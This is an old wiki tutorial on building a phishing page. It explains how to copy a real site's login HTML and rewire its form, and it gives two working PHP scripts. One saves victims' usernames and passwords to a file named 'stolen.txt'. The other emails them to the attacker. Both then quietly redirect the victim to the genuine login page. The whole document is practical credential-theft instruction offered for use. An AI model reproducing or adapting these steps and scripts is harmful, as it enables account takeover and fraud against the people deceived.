Create a phishing page

 

How To Make A Phishing Page


This article shows you 1 method attackers use to make phishing pages using php.

part 1: HTML


To start with, navigate to the page you want to create a page for. Now right click on the page and select "view source." This bring up the html source code of the page. You need the page to be able to work fine outside of the site. This part can become long and frustrating, but shouldn't be too hard.


$lt;a href='src/login.php'$gt;

is a shortened URL. All these forms of links need to be changed to the full url. This is also the same for everything on the page, e.g. images, JavaScript, flash files .. etc if you notice that they all could be fixed using the same format, you can use HTML "base href" e.g. for http://www.example.com:

$lt;base href="http://www.example.com/"/$gt;

put this at the top of the page, and click file --$gt; save as and save it as index.html and run it. If everything on the page works, your done. Otherwise change them all manually.


$lt;form action="login.php" method="post"$gt;
  • $lt;input type="text" id="username" name="username"/$gt;
  • $lt;input type="password" id="password" name="password"/$gt;
  • $lt;input type="submit" name="Login" value="Login"$gt;
    $lt;/form$gt;


    You need to focus on the parts in red. The first needs to be changed to the full location of your php script on the last 3 need to be written down to add to the script. Try opening the page. It should now look just like the actual login page.



    PHP Script


    Finally, the script. There are 2 methods of sending the login information:

    • Store in a text file
      • Send via email


    Text File


    Here is the full code of the page that saves the logins to a textfile:

    $lt;?php
    if ($_POST['submit']){

    $myFile = "stolen.txt";
    $fh = fopen($myFile, 'a') or die("can't open file");
    $stringData = "username: " . $_POST['username'] . "\n";
    fwrite($fh, $stringData);
    $stringData = "password: " . $_POST['password'] . "\n";
    fwrite($fh, $stringData);
    fclose($fh);

    } ?$gt;

    $lt;script$gt;location.href='http://real.site/login.php?invalid_password_link';$lt;/script$gt;


    All the parts in red must be changed,

    • The name of the submit button (final on form)
      • The names of username/password text boxes on the form
        • the final link to the real page once the details are stolen.




    Email


    For this, you will need a decent host with php sendmail enabled. To test if it is on, you could try sending an email using the example listed here Here is the script (refer to the above example for what parts need to be changed:


    $lt;?php

    if ($_POST['submit']) {

    $message = "username: " . $_POST['username'] . "\n";
    $message .= "password: " . $_POST['password'] . "\n";
    $to = "changetoyour@emailaddress.com";

    mail($to, 'Phishing Victim', $message);

    }
    ?$gt;
    $lt;script$gt;location.href='http://real.site/login.php?invalid_password_link';$lt;/script$gt;


    This again needs parts changed in order to work. This is also safer as only you can see the details, so theres no chance of anyone guessing the text file name. That should hopefully be enough to understand how to create these, finally the article below tells you more about phishing and attack methods using the phishing page.


    Links


    Phishing
     
  • Edit this articleEdit this article


    Last modified by: t0mmy9 (February 2, 2009, 6:19 pm)
    Previously modified by: t0mmy9 (February 2, 2009, 6:19 pm), t0mmy9 (February 2, 2009, 6:11 pm), t0mmy9 (February 2, 2009, 6:07 pm), t0mmy9 (February 2, 2009, 6:01 pm), t0mmy9 (February 2, 2009, 6:00 pm), t0mmy9 (February 2, 2009, 5:55 pm)